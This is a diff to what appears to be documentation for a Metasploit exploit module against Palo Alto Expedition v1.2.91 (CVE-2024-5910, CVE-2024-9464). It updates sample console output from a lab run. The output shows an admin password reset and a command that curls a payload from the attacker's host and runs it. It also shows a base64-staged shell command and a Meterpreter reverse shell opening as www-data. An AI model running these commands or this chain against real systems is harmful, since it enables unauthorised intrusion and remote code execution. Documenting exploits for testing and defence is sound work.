@@ -58,29 +58,56 @@ Running the exploit against Expedition v1.2.91 on Ubuntu Server 20.04.1, using c
5858similar to the following:
5959
6060```
61- msf6 exploit(linux/http/paloalto_expedition_rce) > exploit
61+ msf6 exploit(linux/http/paloalto_expedition_rce) > exploit
6262
63+ [*] Command to run on remote host: curl -so /tmp/zRe http://192.168.137.204:8080/qv_gAdz7yjcgH-ohM3GesA; chmod +x /tmp/zRe; /tmp/zRe &
64+ [*] Fetch handler listening on 192.168.137.204:8080
65+ [*] HTTP server started
66+ [*] Adding resource /qv_gAdz7yjcgH-ohM3GesA
6367[*] Started reverse TCP handler on 192.168.137.204:4444
6468[*] Running automatic check ("set AutoCheck false" to disable)
6569[+] Admin password successfully restored to default value paloalto (CVE-2024-5910).
6670[+] Successfully authenticated
71+ [*] Got csrftoken: MTczMTM4MjY0NUNRV0RkNXBXR3Vic2hkR1ZZTHBSQTd1cWY5MjVWYWIw
6772[*] Version retrieved: 1.2.91
68- [*] Vulnerable to CVE-2024-5910 and appears to be vulnerable to CVE-2024-9464.
6973[+] The target appears to be vulnerable.
74+ [*] Command chunk size = 30
75+ [+] Successfully authenticated
76+ [*] Got csrftoken: MTczMTM4MjY0NnpDVDRUcXdDRWhvZ09HWDNnMFdHUW81cXU2aHppTEdE
7077[*] Adding a new cronjob...
71- [*] Injecting OS command...
72- [*] Sending stage (3045380 bytes) to 192.168.137.203
73- [*] Meterpreter session 1 opened (192.168.137.204:4444 -> 192.168.137.203:49006) at 2024-10-13 19:30:10 -0400
74- [*] cleanup file: /tmp/j
78+ [*] Staging chunk 1 of 9
79+ [*] Running command: echo -n "echo Y3VybCAtc28gL3RtcC96UmUga" > /tmp/fglGT
80+ [*] Staging chunk 2 of 9
81+ [*] Running command: echo -n "HR0cDovLzE5Mi4xNjguMTM3LjIwNDo" >> /tmp/fglGT
82+ [*] Staging chunk 3 of 9
83+ [*] Running command: echo -n "4MDgwL3F2X2dBZHo3eWpjZ0gtb2hNM" >> /tmp/fglGT
84+ [*] Staging chunk 4 of 9
85+ [*] Running command: echo -n "0dlc0E7IGNobW9kICt4IC90bXAvelJ" >> /tmp/fglGT
86+ [*] Staging chunk 5 of 9
87+ [*] Running command: echo -n "lOyAvdG1wL3pSZSAm|((command -v" >> /tmp/fglGT
88+ [*] Staging chunk 6 of 9
89+ [*] Running command: echo -n " base64 >/dev/null && (base64 " >> /tmp/fglGT
90+ [*] Staging chunk 7 of 9
91+ [*] Running command: echo -n "--decode || base64 -d)) || (co" >> /tmp/fglGT
92+ [*] Staging chunk 8 of 9
93+ [*] Running command: echo -n "mmand -v openssl >/dev/null &&" >> /tmp/fglGT
94+ [*] Staging chunk 9 of 9
95+ [*] Running command: echo -n " openssl enc -base64 -d))|sh" >> /tmp/fglGT
96+ [+] Command staged; command execution requires a timeout and will take a few seconds.
97+ [*] Running command: cat /tmp/fglGT | sh && rm /tmp/fglGT
98+ [*] Client 192.168.137.205 requested /qv_gAdz7yjcgH-ohM3GesA
99+ [*] Sending payload to 192.168.137.205 (curl/7.68.0)
100+ [*] Transmitting intermediate stager...(126 bytes)
101+ [*] Sending stage (3045380 bytes) to 192.168.137.205
102+ [*] Meterpreter session 10 opened (192.168.137.204:4444 -> 192.168.137.205:58030) at 2024-11-11 22:37:40 -0500
75103[*] Check thy shell.
76104
77- meterpreter > sysinfo
78- Computer : 192.168.137.203
105+ meterpreter > sysinfo
106+ Computer : 192.168.137.205
79107OS : Ubuntu 20.04 (Linux 5.4.0-42-generic)
80108Architecture : x64
81109BuildTuple : x86_64-linux-musl
82110Meterpreter : x64/linux
83- meterpreter > getuid
111+ meterpreter > getuid
84112Server username: www-data
85- meterpreter >
86113```
0 commit comments